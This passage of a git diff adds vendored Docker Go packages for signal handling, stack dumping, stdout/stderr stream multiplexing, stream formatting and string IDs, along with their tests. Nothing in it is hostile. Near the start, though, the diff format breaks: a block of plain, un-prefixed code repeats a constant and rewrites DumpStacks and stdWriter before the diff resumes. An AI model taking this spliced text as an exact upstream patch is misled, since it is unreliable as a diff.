+ go func() { + interruptCount := uint32(0) + for sig := range c { + if sig == syscall.SIGPIPE { + continue + } + + go func(sig os.Signal) { + logrus.Infof("Processing signal '%v'", sig) + switch sig { + case os.Interrupt, syscall.SIGTERM: + if atomic.LoadUint32(&interruptCount) < 3 { + // Initiate the cleanup only once + if atomic.AddUint32(&interruptCount, 1) == 1 { + // Call the provided cleanup handler + cleanup() + os.Exit(0) + } else { + return + } + } else { + // 3 SIGTERM/INT signals received; force exit without cleanup + logrus.Info("Forcing docker daemon shutdown without cleanup; 3 interrupts received") + } + case syscall.SIGQUIT: + DumpStacks("") + logrus.Info("Forcing docker daemon shutdown without cleanup on SIGQUIT") + } + //for the SIGINT/TERM, and SIGQUIT non-clean shutdown case, exit with 128 + signal # + os.Exit(128 + int(sig.(syscall.Signal))) + }(sig) + } + }() +} + +const stacksLogNameTemplate = "goroutine-stacks-%s.log" + +// DumpStacks appends the runtime stack into file in dir and returns full path +// to that file. 
const stacksLogNameTemplate = "goroutine-stacks-%s.log"

// DumpStacks appends the runtime stacks of all goroutines to a timestamped
// file inside dir, or to stderr when dir is empty, and returns the full
// path of the destination. Errors are wrapped with stdlib %w (replacing the
// former github.com/pkg/errors dependency; the message text is unchanged).
func DumpStacks(dir string) (string, error) {
	// runtime.Stack truncates silently when the buffer is too small: keep
	// doubling until the reported size is strictly smaller than the buffer.
	buf := make([]byte, 16384)
	for {
		n := runtime.Stack(buf, true)
		if n < len(buf) {
			buf = buf[:n]
			break
		}
		buf = make([]byte, 2*len(buf))
	}

	var f *os.File
	if dir != "" {
		// Strip ':' from the timestamp so the name is safe on all filesystems.
		name := fmt.Sprintf(stacksLogNameTemplate, strings.Replace(time.Now().Format(time.RFC3339), ":", "", -1))
		path := filepath.Join(dir, name)
		var err error
		f, err = os.OpenFile(path, os.O_CREATE|os.O_WRONLY, 0666)
		if err != nil {
			return "", fmt.Errorf("failed to open file to write the goroutine stacks: %w", err)
		}
		defer f.Close()
		defer f.Sync() // deferred LIFO: Sync runs before Close
	} else {
		f = os.Stderr
	}

	if _, err := f.Write(buf); err != nil {
		return "", fmt.Errorf("failed to write goroutine stacks: %w", err)
	}
	return f.Name(), nil
}
// StdType is the type of standard stream a writer can multiplex to.
type StdType byte

const (
	// Stdin represents standard input stream type.
	Stdin StdType = iota
	// Stdout represents standard output stream type.
	Stdout
	// Stderr represents standard error steam type.
	Stderr

	stdWriterPrefixLen = 8
	stdWriterFdIndex   = 0
	stdWriterSizeIndex = 4

	startingBufLen = 32*1024 + stdWriterPrefixLen + 1
)

// bufPool recycles frame buffers to avoid an allocation per Write.
var bufPool = &sync.Pool{New: func() interface{} { return bytes.NewBuffer(nil) }}

// stdWriter wraps an io.Writer and frames every payload with a stream
// header so that stdcopy.StdCopy can demultiplex the combined output.
type stdWriter struct {
	io.Writer
	prefix byte
}

// Write frames p with an 8-byte header (stream id + big-endian payload
// length) and sends header+payload to the underlying writer in one call.
// The returned count excludes the header, keeping io.Writer semantics.
func (w *stdWriter) Write(p []byte) (int, error) {
	if w == nil || w.Writer == nil {
		return 0, errors.New("Writer not instantiated")
	}
	if p == nil {
		return 0, nil
	}

	var header [stdWriterPrefixLen]byte
	header[stdWriterFdIndex] = w.prefix
	binary.BigEndian.PutUint32(header[stdWriterSizeIndex:], uint32(len(p)))

	frame := bufPool.Get().(*bytes.Buffer)
	frame.Write(header[:])
	frame.Write(p)

	written, err := w.Writer.Write(frame.Bytes())
	frame.Reset()
	bufPool.Put(frame)

	// Report only payload bytes; never a negative count.
	written -= stdWriterPrefixLen
	if written < 0 {
		written = 0
	}
	return written, err
}

// NewStdWriter instantiates a new Writer.
// Everything written to it will be encapsulated using a custom format,
// and written to the underlying `w` stream.
// This allows multiple write streams (e.g. stdout and stderr) to be muxed
// into a single connection. `t` indicates the id of the stream to
// encapsulate: stdcopy.Stdin, stdcopy.Stdout or stdcopy.Stderr.
func NewStdWriter(w io.Writer, t StdType) io.Writer {
	return &stdWriter{Writer: w, prefix: byte(t)}
}
+func StdCopy(dstout, dsterr io.Writer, src io.Reader) (written int64, err error) { + var ( + buf = make([]byte, startingBufLen) + bufLen = len(buf) + nr, nw int + er, ew error + out io.Writer + frameSize int + ) + + for { + // Make sure we have at least a full header + for nr < stdWriterPrefixLen { + var nr2 int + nr2, er = src.Read(buf[nr:]) + nr += nr2 + if er == io.EOF { + if nr < stdWriterPrefixLen { + return written, nil + } + break + } + if er != nil { + return 0, er + } + } + + // Check the first byte to know where to write + switch StdType(buf[stdWriterFdIndex]) { + case Stdin: + fallthrough + case Stdout: + // Write on stdout + out = dstout + case Stderr: + // Write on stderr + out = dsterr + default: + return 0, fmt.Errorf("Unrecognized input header: %d", buf[stdWriterFdIndex]) + } + + // Retrieve the size of the frame + frameSize = int(binary.BigEndian.Uint32(buf[stdWriterSizeIndex : stdWriterSizeIndex+4])) + + // Check if the buffer is big enough to read the frame. + // Extend it if necessary. + if frameSize+stdWriterPrefixLen > bufLen { + buf = append(buf, make([]byte, frameSize+stdWriterPrefixLen-bufLen+1)...) 
+ bufLen = len(buf) + } + + // While the amount of bytes read is less than the size of the frame + header, we keep reading + for nr < frameSize+stdWriterPrefixLen { + var nr2 int + nr2, er = src.Read(buf[nr:]) + nr += nr2 + if er == io.EOF { + if nr < frameSize+stdWriterPrefixLen { + return written, nil + } + break + } + if er != nil { + return 0, er + } + } + + // Write the retrieved frame (without header) + nw, ew = out.Write(buf[stdWriterPrefixLen : frameSize+stdWriterPrefixLen]) + if ew != nil { + return 0, ew + } + // If the frame has not been fully written: error + if nw != frameSize { + return 0, io.ErrShortWrite + } + written += int64(nw) + + // Move the rest of the buffer to the beginning + copy(buf, buf[frameSize+stdWriterPrefixLen:]) + // Move the index + nr -= frameSize + stdWriterPrefixLen + } +} diff --git a/vendor/github.com/docker/docker/pkg/stdcopy/stdcopy_test.go b/vendor/github.com/docker/docker/pkg/stdcopy/stdcopy_test.go new file mode 100644 index 0000000000..3137a75239 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/stdcopy/stdcopy_test.go @@ -0,0 +1,260 @@ +package stdcopy + +import ( + "bytes" + "errors" + "io" + "io/ioutil" + "strings" + "testing" +) + +func TestNewStdWriter(t *testing.T) { + writer := NewStdWriter(ioutil.Discard, Stdout) + if writer == nil { + t.Fatalf("NewStdWriter with an invalid StdType should not return nil.") + } +} + +func TestWriteWithUnitializedStdWriter(t *testing.T) { + writer := stdWriter{ + Writer: nil, + prefix: byte(Stdout), + } + n, err := writer.Write([]byte("Something here")) + if n != 0 || err == nil { + t.Fatalf("Should fail when given an uncomplete or uninitialized StdWriter") + } +} + +func TestWriteWithNilBytes(t *testing.T) { + writer := NewStdWriter(ioutil.Discard, Stdout) + n, err := writer.Write(nil) + if err != nil { + t.Fatalf("Shouldn't have fail when given no data") + } + if n > 0 { + t.Fatalf("Write should have written 0 byte, but has written %d", n) + } +} + +func TestWrite(t 
*testing.T) { + writer := NewStdWriter(ioutil.Discard, Stdout) + data := []byte("Test StdWrite.Write") + n, err := writer.Write(data) + if err != nil { + t.Fatalf("Error while writing with StdWrite") + } + if n != len(data) { + t.Fatalf("Write should have written %d byte but wrote %d.", len(data), n) + } +} + +type errWriter struct { + n int + err error +} + +func (f *errWriter) Write(buf []byte) (int, error) { + return f.n, f.err +} + +func TestWriteWithWriterError(t *testing.T) { + expectedError := errors.New("expected") + expectedReturnedBytes := 10 + writer := NewStdWriter(&errWriter{ + n: stdWriterPrefixLen + expectedReturnedBytes, + err: expectedError}, Stdout) + data := []byte("This won't get written, sigh") + n, err := writer.Write(data) + if err != expectedError { + t.Fatalf("Didn't get expected error.") + } + if n != expectedReturnedBytes { + t.Fatalf("Didn't get expected written bytes %d, got %d.", + expectedReturnedBytes, n) + } +} + +func TestWriteDoesNotReturnNegativeWrittenBytes(t *testing.T) { + writer := NewStdWriter(&errWriter{n: -1}, Stdout) + data := []byte("This won't get written, sigh") + actual, _ := writer.Write(data) + if actual != 0 { + t.Fatalf("Expected returned written bytes equal to 0, got %d", actual) + } +} + +func getSrcBuffer(stdOutBytes, stdErrBytes []byte) (buffer *bytes.Buffer, err error) { + buffer = new(bytes.Buffer) + dstOut := NewStdWriter(buffer, Stdout) + _, err = dstOut.Write(stdOutBytes) + if err != nil { + return + } + dstErr := NewStdWriter(buffer, Stderr) + _, err = dstErr.Write(stdErrBytes) + return +} + +func TestStdCopyWriteAndRead(t *testing.T) { + stdOutBytes := []byte(strings.Repeat("o", startingBufLen)) + stdErrBytes := []byte(strings.Repeat("e", startingBufLen)) + buffer, err := getSrcBuffer(stdOutBytes, stdErrBytes) + if err != nil { + t.Fatal(err) + } + written, err := StdCopy(ioutil.Discard, ioutil.Discard, buffer) + if err != nil { + t.Fatal(err) + } + expectedTotalWritten := len(stdOutBytes) + 
len(stdErrBytes) + if written != int64(expectedTotalWritten) { + t.Fatalf("Expected to have total of %d bytes written, got %d", expectedTotalWritten, written) + } +} + +type customReader struct { + n int + err error + totalCalls int + correctCalls int + src *bytes.Buffer +} + +func (f *customReader) Read(buf []byte) (int, error) { + f.totalCalls++ + if f.totalCalls <= f.correctCalls { + return f.src.Read(buf) + } + return f.n, f.err +} + +func TestStdCopyReturnsErrorReadingHeader(t *testing.T) { + expectedError := errors.New("error") + reader := &customReader{ + err: expectedError} + written, err := StdCopy(ioutil.Discard, ioutil.Discard, reader) + if written != 0 { + t.Fatalf("Expected 0 bytes read, got %d", written) + } + if err != expectedError { + t.Fatalf("Didn't get expected error") + } +} + +func TestStdCopyReturnsErrorReadingFrame(t *testing.T) { + expectedError := errors.New("error") + stdOutBytes := []byte(strings.Repeat("o", startingBufLen)) + stdErrBytes := []byte(strings.Repeat("e", startingBufLen)) + buffer, err := getSrcBuffer(stdOutBytes, stdErrBytes) + if err != nil { + t.Fatal(err) + } + reader := &customReader{ + correctCalls: 1, + n: stdWriterPrefixLen + 1, + err: expectedError, + src: buffer} + written, err := StdCopy(ioutil.Discard, ioutil.Discard, reader) + if written != 0 { + t.Fatalf("Expected 0 bytes read, got %d", written) + } + if err != expectedError { + t.Fatalf("Didn't get expected error") + } +} + +func TestStdCopyDetectsCorruptedFrame(t *testing.T) { + stdOutBytes := []byte(strings.Repeat("o", startingBufLen)) + stdErrBytes := []byte(strings.Repeat("e", startingBufLen)) + buffer, err := getSrcBuffer(stdOutBytes, stdErrBytes) + if err != nil { + t.Fatal(err) + } + reader := &customReader{ + correctCalls: 1, + n: stdWriterPrefixLen + 1, + err: io.EOF, + src: buffer} + written, err := StdCopy(ioutil.Discard, ioutil.Discard, reader) + if written != startingBufLen { + t.Fatalf("Expected %d bytes read, got %d", startingBufLen, written) + 
} + if err != nil { + t.Fatal("Didn't get nil error") + } +} + +func TestStdCopyWithInvalidInputHeader(t *testing.T) { + dstOut := NewStdWriter(ioutil.Discard, Stdout) + dstErr := NewStdWriter(ioutil.Discard, Stderr) + src := strings.NewReader("Invalid input") + _, err := StdCopy(dstOut, dstErr, src) + if err == nil { + t.Fatal("StdCopy with invalid input header should fail.") + } +} + +func TestStdCopyWithCorruptedPrefix(t *testing.T) { + data := []byte{0x01, 0x02, 0x03} + src := bytes.NewReader(data) + written, err := StdCopy(nil, nil, src) + if err != nil { + t.Fatalf("StdCopy should not return an error with corrupted prefix.") + } + if written != 0 { + t.Fatalf("StdCopy should have written 0, but has written %d", written) + } +} + +func TestStdCopyReturnsWriteErrors(t *testing.T) { + stdOutBytes := []byte(strings.Repeat("o", startingBufLen)) + stdErrBytes := []byte(strings.Repeat("e", startingBufLen)) + buffer, err := getSrcBuffer(stdOutBytes, stdErrBytes) + if err != nil { + t.Fatal(err) + } + expectedError := errors.New("expected") + + dstOut := &errWriter{err: expectedError} + + written, err := StdCopy(dstOut, ioutil.Discard, buffer) + if written != 0 { + t.Fatalf("StdCopy should have written 0, but has written %d", written) + } + if err != expectedError { + t.Fatalf("Didn't get expected error, got %v", err) + } +} + +func TestStdCopyDetectsNotFullyWrittenFrames(t *testing.T) { + stdOutBytes := []byte(strings.Repeat("o", startingBufLen)) + stdErrBytes := []byte(strings.Repeat("e", startingBufLen)) + buffer, err := getSrcBuffer(stdOutBytes, stdErrBytes) + if err != nil { + t.Fatal(err) + } + dstOut := &errWriter{n: startingBufLen - 10} + + written, err := StdCopy(dstOut, ioutil.Discard, buffer) + if written != 0 { + t.Fatalf("StdCopy should have return 0 written bytes, but returned %d", written) + } + if err != io.ErrShortWrite { + t.Fatalf("Didn't get expected io.ErrShortWrite error") + } +} + +func BenchmarkWrite(b *testing.B) { + w := 
NewStdWriter(ioutil.Discard, Stdout) + data := []byte("Test line for testing stdwriter performance\n") + data = bytes.Repeat(data, 100) + b.SetBytes(int64(len(data))) + b.ResetTimer() + for i := 0; i < b.N; i++ { + if _, err := w.Write(data); err != nil { + b.Fatal(err) + } + } +} diff --git a/vendor/github.com/docker/docker/pkg/streamformatter/streamformatter.go b/vendor/github.com/docker/docker/pkg/streamformatter/streamformatter.go new file mode 100644 index 0000000000..ce6ea79dee --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/streamformatter/streamformatter.go @@ -0,0 +1,172 @@ +// Package streamformatter provides helper functions to format a stream. +package streamformatter + +import ( + "encoding/json" + "fmt" + "io" + + "github.com/docker/docker/pkg/jsonmessage" + "github.com/docker/docker/pkg/progress" +) + +// StreamFormatter formats a stream, optionally using JSON. +type StreamFormatter struct { + json bool +} + +// NewStreamFormatter returns a simple StreamFormatter +func NewStreamFormatter() *StreamFormatter { + return &StreamFormatter{} +} + +// NewJSONStreamFormatter returns a StreamFormatter configured to stream json +func NewJSONStreamFormatter() *StreamFormatter { + return &StreamFormatter{true} +} + +const streamNewline = "\r\n" + +var streamNewlineBytes = []byte(streamNewline) + +// FormatStream formats the specified stream. +func (sf *StreamFormatter) FormatStream(str string) []byte { + if sf.json { + b, err := json.Marshal(&jsonmessage.JSONMessage{Stream: str}) + if err != nil { + return sf.FormatError(err) + } + return append(b, streamNewlineBytes...) + } + return []byte(str + "\r") +} + +// FormatStatus formats the specified objects according to the specified format (and id). +func (sf *StreamFormatter) FormatStatus(id, format string, a ...interface{}) []byte { + str := fmt.Sprintf(format, a...) 
+ if sf.json { + b, err := json.Marshal(&jsonmessage.JSONMessage{ID: id, Status: str}) + if err != nil { + return sf.FormatError(err) + } + return append(b, streamNewlineBytes...) + } + return []byte(str + streamNewline) +} + +// FormatError formats the specified error. +func (sf *StreamFormatter) FormatError(err error) []byte { + if sf.json { + jsonError, ok := err.(*jsonmessage.JSONError) + if !ok { + jsonError = &jsonmessage.JSONError{Message: err.Error()} + } + if b, err := json.Marshal(&jsonmessage.JSONMessage{Error: jsonError, ErrorMessage: err.Error()}); err == nil { + return append(b, streamNewlineBytes...) + } + return []byte("{\"error\":\"format error\"}" + streamNewline) + } + return []byte("Error: " + err.Error() + streamNewline) +} + +// FormatProgress formats the progress information for a specified action. +func (sf *StreamFormatter) FormatProgress(id, action string, progress *jsonmessage.JSONProgress, aux interface{}) []byte { + if progress == nil { + progress = &jsonmessage.JSONProgress{} + } + if sf.json { + var auxJSON *json.RawMessage + if aux != nil { + auxJSONBytes, err := json.Marshal(aux) + if err != nil { + return nil + } + auxJSON = new(json.RawMessage) + *auxJSON = auxJSONBytes + } + b, err := json.Marshal(&jsonmessage.JSONMessage{ + Status: action, + ProgressMessage: progress.String(), + Progress: progress, + ID: id, + Aux: auxJSON, + }) + if err != nil { + return nil + } + return append(b, streamNewlineBytes...) + } + endl := "\r" + if progress.String() == "" { + endl += "\n" + } + return []byte(action + " " + progress.String() + endl) +} + +// NewProgressOutput returns a progress.Output object that can be passed to +// progress.NewProgressReader. 
+func (sf *StreamFormatter) NewProgressOutput(out io.Writer, newLines bool) progress.Output { + return &progressOutput{ + sf: sf, + out: out, + newLines: newLines, + } +} + +type progressOutput struct { + sf *StreamFormatter + out io.Writer + newLines bool +} + +// WriteProgress formats progress information from a ProgressReader. +func (out *progressOutput) WriteProgress(prog progress.Progress) error { + var formatted []byte + if prog.Message != "" { + formatted = out.sf.FormatStatus(prog.ID, prog.Message) + } else { + jsonProgress := jsonmessage.JSONProgress{Current: prog.Current, Total: prog.Total} + formatted = out.sf.FormatProgress(prog.ID, prog.Action, &jsonProgress, prog.Aux) + } + _, err := out.out.Write(formatted) + if err != nil { + return err + } + + if out.newLines && prog.LastUpdate { + _, err = out.out.Write(out.sf.FormatStatus("", "")) + return err + } + + return nil +} + +// StdoutFormatter is a streamFormatter that writes to the standard output. +type StdoutFormatter struct { + io.Writer + *StreamFormatter +} + +func (sf *StdoutFormatter) Write(buf []byte) (int, error) { + formattedBuf := sf.StreamFormatter.FormatStream(string(buf)) + n, err := sf.Writer.Write(formattedBuf) + if n != len(formattedBuf) { + return n, io.ErrShortWrite + } + return len(buf), err +} + +// StderrFormatter is a streamFormatter that writes to the standard error. 
+type StderrFormatter struct { + io.Writer + *StreamFormatter +} + +func (sf *StderrFormatter) Write(buf []byte) (int, error) { + formattedBuf := sf.StreamFormatter.FormatStream("\033[91m" + string(buf) + "\033[0m") + n, err := sf.Writer.Write(formattedBuf) + if n != len(formattedBuf) { + return n, io.ErrShortWrite + } + return len(buf), err +} diff --git a/vendor/github.com/docker/docker/pkg/streamformatter/streamformatter_test.go b/vendor/github.com/docker/docker/pkg/streamformatter/streamformatter_test.go new file mode 100644 index 0000000000..93ec90f5f7 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/streamformatter/streamformatter_test.go @@ -0,0 +1,108 @@ +package streamformatter + +import ( + "encoding/json" + "errors" + "reflect" + "strings" + "testing" + + "github.com/docker/docker/pkg/jsonmessage" +) + +func TestFormatStream(t *testing.T) { + sf := NewStreamFormatter() + res := sf.FormatStream("stream") + if string(res) != "stream"+"\r" { + t.Fatalf("%q", res) + } +} + +func TestFormatJSONStatus(t *testing.T) { + sf := NewStreamFormatter() + res := sf.FormatStatus("ID", "%s%d", "a", 1) + if string(res) != "a1\r\n" { + t.Fatalf("%q", res) + } +} + +func TestFormatSimpleError(t *testing.T) { + sf := NewStreamFormatter() + res := sf.FormatError(errors.New("Error for formatter")) + if string(res) != "Error: Error for formatter\r\n" { + t.Fatalf("%q", res) + } +} + +func TestJSONFormatStream(t *testing.T) { + sf := NewJSONStreamFormatter() + res := sf.FormatStream("stream") + if string(res) != `{"stream":"stream"}`+"\r\n" { + t.Fatalf("%q", res) + } +} + +func TestJSONFormatStatus(t *testing.T) { + sf := NewJSONStreamFormatter() + res := sf.FormatStatus("ID", "%s%d", "a", 1) + if string(res) != `{"status":"a1","id":"ID"}`+"\r\n" { + t.Fatalf("%q", res) + } +} + +func TestJSONFormatSimpleError(t *testing.T) { + sf := NewJSONStreamFormatter() + res := sf.FormatError(errors.New("Error for formatter")) + if string(res) != `{"errorDetail":{"message":"Error 
for formatter"},"error":"Error for formatter"}`+"\r\n" { + t.Fatalf("%q", res) + } +} + +func TestJSONFormatJSONError(t *testing.T) { + sf := NewJSONStreamFormatter() + err := &jsonmessage.JSONError{Code: 50, Message: "Json error"} + res := sf.FormatError(err) + if string(res) != `{"errorDetail":{"code":50,"message":"Json error"},"error":"Json error"}`+"\r\n" { + t.Fatalf("%q", res) + } +} + +func TestJSONFormatProgress(t *testing.T) { + sf := NewJSONStreamFormatter() + progress := &jsonmessage.JSONProgress{ + Current: 15, + Total: 30, + Start: 1, + } + res := sf.FormatProgress("id", "action", progress, nil) + msg := &jsonmessage.JSONMessage{} + if err := json.Unmarshal(res, msg); err != nil { + t.Fatal(err) + } + if msg.ID != "id" { + t.Fatalf("ID must be 'id', got: %s", msg.ID) + } + if msg.Status != "action" { + t.Fatalf("Status must be 'action', got: %s", msg.Status) + } + + // The progress will always be in the format of: + // [=========================> ] 15 B/30 B 404933h7m11s + // The last entry '404933h7m11s' is the timeLeftBox. + // However, the timeLeftBox field may change as progress.String() depends on time.Now(). + // Therefore, we have to strip the timeLeftBox from the strings to do the comparison. + + // Compare the progress strings before the timeLeftBox + expectedProgress := "[=========================> ] 15 B/30 B" + // if terminal column is <= 110, expectedProgressShort is expected. 
+ expectedProgressShort := " 15 B/30 B" + if !(strings.HasPrefix(msg.ProgressMessage, expectedProgress) || + strings.HasPrefix(msg.ProgressMessage, expectedProgressShort)) { + t.Fatalf("ProgressMessage without the timeLeftBox must be %s or %s, got: %s", + expectedProgress, expectedProgressShort, msg.ProgressMessage) + } + + if !reflect.DeepEqual(msg.Progress, progress) { + t.Fatal("Original progress not equals progress from FormatProgress") + } +} diff --git a/vendor/github.com/docker/docker/pkg/stringid/README.md b/vendor/github.com/docker/docker/pkg/stringid/README.md new file mode 100644 index 0000000000..37a5098fd9 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/stringid/README.md @@ -0,0 +1 @@ +This package provides helper functions for dealing with string identifiers diff --git a/vendor/github.com/docker/docker/pkg/stringid/stringid.go b/vendor/github.com/docker/docker/pkg/stringid/stringid.go new file mode 100644 index 0000000000..fa35d8bad5 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/stringid/stringid.go @@ -0,0 +1,69 @@ +// Package stringid provides helper functions for dealing with string identifiers +package stringid + +import ( + "crypto/rand" + "encoding/hex" + "io" + "regexp" + "strconv" + "strings" + + "github.com/docker/docker/pkg/random" +) + +const shortLen = 12 + +var validShortID = regexp.MustCompile("^[a-z0-9]{12}$") + +// IsShortID determines if an arbitrary string *looks like* a short ID. +func IsShortID(id string) bool { + return validShortID.MatchString(id) +} + +// TruncateID returns a shorthand version of a string identifier for convenience. +// A collision with other shorthands is very unlikely, but possible. +// In case of a collision a lookup with TruncIndex.Get() will fail, and the caller +// will need to use a longer prefix, or the full-length Id. 
+func TruncateID(id string) string { + if i := strings.IndexRune(id, ':'); i >= 0 { + id = id[i+1:] + } + if len(id) > shortLen { + id = id[:shortLen] + } + return id +} + +func generateID(crypto bool) string { + b := make([]byte, 32) + r := random.Reader + if crypto { + r = rand.Reader + } + for { + if _, err := io.ReadFull(r, b); err != nil { + panic(err) // This shouldn't happen + } + id := hex.EncodeToString(b) + // if we try to parse the truncated for as an int and we don't have + // an error then the value is all numeric and causes issues when + // used as a hostname. ref #3869 + if _, err := strconv.ParseInt(TruncateID(id), 10, 64); err == nil { + continue + } + return id + } +} + +// GenerateRandomID returns a unique id. +func GenerateRandomID() string { + return generateID(true) +} + +// GenerateNonCryptoID generates unique id without using cryptographically +// secure sources of random. +// It helps you to save entropy. +func GenerateNonCryptoID() string { + return generateID(false) +} diff --git a/vendor/github.com/docker/docker/pkg/stringid/stringid_test.go b/vendor/github.com/docker/docker/pkg/stringid/stringid_test.go new file mode 100644 index 0000000000..8ff6b4383d --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/stringid/stringid_test.go @@ -0,0 +1,72 @@ +package stringid + +import ( + "strings" + "testing" +) + +func TestGenerateRandomID(t *testing.T) { + id := GenerateRandomID() + + if len(id) != 64 { + t.Fatalf("Id returned is incorrect: %s", id) + } +} + +func TestGenerateNonCryptoID(t *testing.T) { + id := GenerateNonCryptoID() + + if len(id) != 64 { + t.Fatalf("Id returned is incorrect: %s", id) + } +} + +func TestShortenId(t *testing.T) { + id := "90435eec5c4e124e741ef731e118be2fc799a68aba0466ec17717f24ce2ae6a2" + truncID := TruncateID(id) + if truncID != "90435eec5c4e" { + t.Fatalf("Id returned is incorrect: truncate on %s returned %s", id, truncID) + } +} + +func TestShortenSha256Id(t *testing.T) { + id := 
"sha256:4e38e38c8ce0b8d9041a9c4fefe786631d1416225e13b0bfe8cfa2321aec4bba" + truncID := TruncateID(id) + if truncID != "4e38e38c8ce0" { + t.Fatalf("Id returned is incorrect: truncate on %s returned %s", id, truncID) + } +} + +func TestShortenIdEmpty(t *testing.T) { + id := "" + truncID := TruncateID(id) + if len(truncID) > len(id) { + t.Fatalf("Id returned is incorrect: truncate on %s returned %s", id, truncID) + } +} + +func TestShortenIdInvalid(t *testing.T) { + id := "1234" + truncID := TruncateID(id) + if len(truncID) != len(id) { + t.Fatalf("Id returned is incorrect: truncate on %s returned %s", id, truncID) + } +} + +func TestIsShortIDNonHex(t *testing.T) { + id := "some non-hex value" + if IsShortID(id) { + t.Fatalf("%s is not a short ID", id) + } +} + +func TestIsShortIDNotCorrectSize(t *testing.T) { + id := strings.Repeat("a", shortLen+1) + if IsShortID(id) { + t.Fatalf("%s is not a short ID", id) + } + id = strings.Repeat("a", shortLen-1) + if IsShortID(id) { + t.Fatalf("%s is not a short ID", id) + } +} diff --git a/vendor/github.com/docker/docker/pkg/stringutils/README.md b/vendor/github.com/docker/docker/pkg/stringutils/README.md new file mode 100644 index 0000000000..b3e454573c --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/stringutils/README.md @@ -0,0 +1 @@ +This package provides helper functions for dealing with strings diff --git a/vendor/github.com/docker/docker/pkg/stringutils/stringutils.go b/vendor/github.com/docker/docker/pkg/stringutils/stringutils.go new file mode 100644 index 0000000000..8e1c812d7a --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/stringutils/stringutils.go @@ -0,0 +1,101 @@ +// Package stringutils provides helper functions for dealing with strings. +package stringutils + +import ( + "bytes" + "math/rand" + "strings" + + "github.com/docker/docker/pkg/random" +) + +// GenerateRandomAlphaOnlyString generates an alphabetical random string with length n. 
+func GenerateRandomAlphaOnlyString(n int) string { + // make a really long string + letters := []byte("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ") + b := make([]byte, n) + for i := range b { + b[i] = letters[random.Rand.Intn(len(letters))] + } + return string(b) +} + +// GenerateRandomASCIIString generates an ASCII random string with length n. +func GenerateRandomASCIIString(n int) string { + chars := "abcdefghijklmnopqrstuvwxyz" + + "ABCDEFGHIJKLMNOPQRSTUVWXYZ" + + "~!@#$%^&*()-_+={}[]\\|<,>.?/\"';:` " + res := make([]byte, n) + for i := 0; i < n; i++ { + res[i] = chars[rand.Intn(len(chars))] + } + return string(res) +} + +// Ellipsis truncates a string to fit within maxlen, and appends ellipsis (...). +// For maxlen of 3 and lower, no ellipsis is appended. +func Ellipsis(s string, maxlen int) string { + r := []rune(s) + if len(r) <= maxlen { + return s + } + if maxlen <= 3 { + return string(r[:maxlen]) + } + return string(r[:maxlen-3]) + "..." +} + +// Truncate truncates a string to maxlen. +func Truncate(s string, maxlen int) string { + r := []rune(s) + if len(r) <= maxlen { + return s + } + return string(r[:maxlen]) +} + +// InSlice tests whether a string is contained in a slice of strings or not. +// Comparison is case insensitive +func InSlice(slice []string, s string) bool { + for _, ss := range slice { + if strings.ToLower(s) == strings.ToLower(ss) { + return true + } + } + return false +} + +func quote(word string, buf *bytes.Buffer) { + // Bail out early for "simple" strings + if word != "" && !strings.ContainsAny(word, "\\'\"`${[|&;<>()~*?! 
\t\n") { + buf.WriteString(word) + return + } + + buf.WriteString("'") + + for i := 0; i < len(word); i++ { + b := word[i] + if b == '\'' { + // Replace literal ' with a close ', a \', and a open ' + buf.WriteString("'\\''") + } else { + buf.WriteByte(b) + } + } + + buf.WriteString("'") +} + +// ShellQuoteArguments takes a list of strings and escapes them so they will be +// handled right when passed as arguments to a program via a shell +func ShellQuoteArguments(args []string) string { + var buf bytes.Buffer + for i, arg := range args { + if i != 0 { + buf.WriteByte(' ') + } + quote(arg, &buf) + } + return buf.String() +} diff --git a/vendor/github.com/docker/docker/pkg/stringutils/stringutils_test.go b/vendor/github.com/docker/docker/pkg/stringutils/stringutils_test.go new file mode 100644 index 0000000000..8af2bdcc0b --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/stringutils/stringutils_test.go @@ -0,0 +1,121 @@ +package stringutils + +import "testing" + +func testLengthHelper(generator func(int) string, t *testing.T) { + expectedLength := 20 + s := generator(expectedLength) + if len(s) != expectedLength { + t.Fatalf("Length of %s was %d but expected length %d", s, len(s), expectedLength) + } +} + +func testUniquenessHelper(generator func(int) string, t *testing.T) { + repeats := 25 + set := make(map[string]struct{}, repeats) + for i := 0; i < repeats; i = i + 1 { + str := generator(64) + if len(str) != 64 { + t.Fatalf("Id returned is incorrect: %s", str) + } + if _, ok := set[str]; ok { + t.Fatalf("Random number is repeated") + } + set[str] = struct{}{} + } +} + +func isASCII(s string) bool { + for _, c := range s { + if c > 127 { + return false + } + } + return true +} + +func TestGenerateRandomAlphaOnlyStringLength(t *testing.T) { + testLengthHelper(GenerateRandomAlphaOnlyString, t) +} + +func TestGenerateRandomAlphaOnlyStringUniqueness(t *testing.T) { + testUniquenessHelper(GenerateRandomAlphaOnlyString, t) +} + +func 
TestGenerateRandomAsciiStringLength(t *testing.T) { + testLengthHelper(GenerateRandomASCIIString, t) +} + +func TestGenerateRandomAsciiStringUniqueness(t *testing.T) { + testUniquenessHelper(GenerateRandomASCIIString, t) +} + +func TestGenerateRandomAsciiStringIsAscii(t *testing.T) { + str := GenerateRandomASCIIString(64) + if !isASCII(str) { + t.Fatalf("%s contained non-ascii characters", str) + } +} + +func TestEllipsis(t *testing.T) { + str := "t🐳ststring" + newstr := Ellipsis(str, 3) + if newstr != "t🐳s" { + t.Fatalf("Expected t🐳s, got %s", newstr) + } + newstr = Ellipsis(str, 8) + if newstr != "t🐳sts..." { + t.Fatalf("Expected tests..., got %s", newstr) + } + newstr = Ellipsis(str, 20) + if newstr != "t🐳ststring" { + t.Fatalf("Expected t🐳ststring, got %s", newstr) + } +} + +func TestTruncate(t *testing.T) { + str := "t🐳ststring" + newstr := Truncate(str, 4) + if newstr != "t🐳st" { + t.Fatalf("Expected t🐳st, got %s", newstr) + } + newstr = Truncate(str, 20) + if newstr != "t🐳ststring" { + t.Fatalf("Expected t🐳ststring, got %s", newstr) + } +} + +func TestInSlice(t *testing.T) { + slice := []string{"t🐳st", "in", "slice"} + + test := InSlice(slice, "t🐳st") 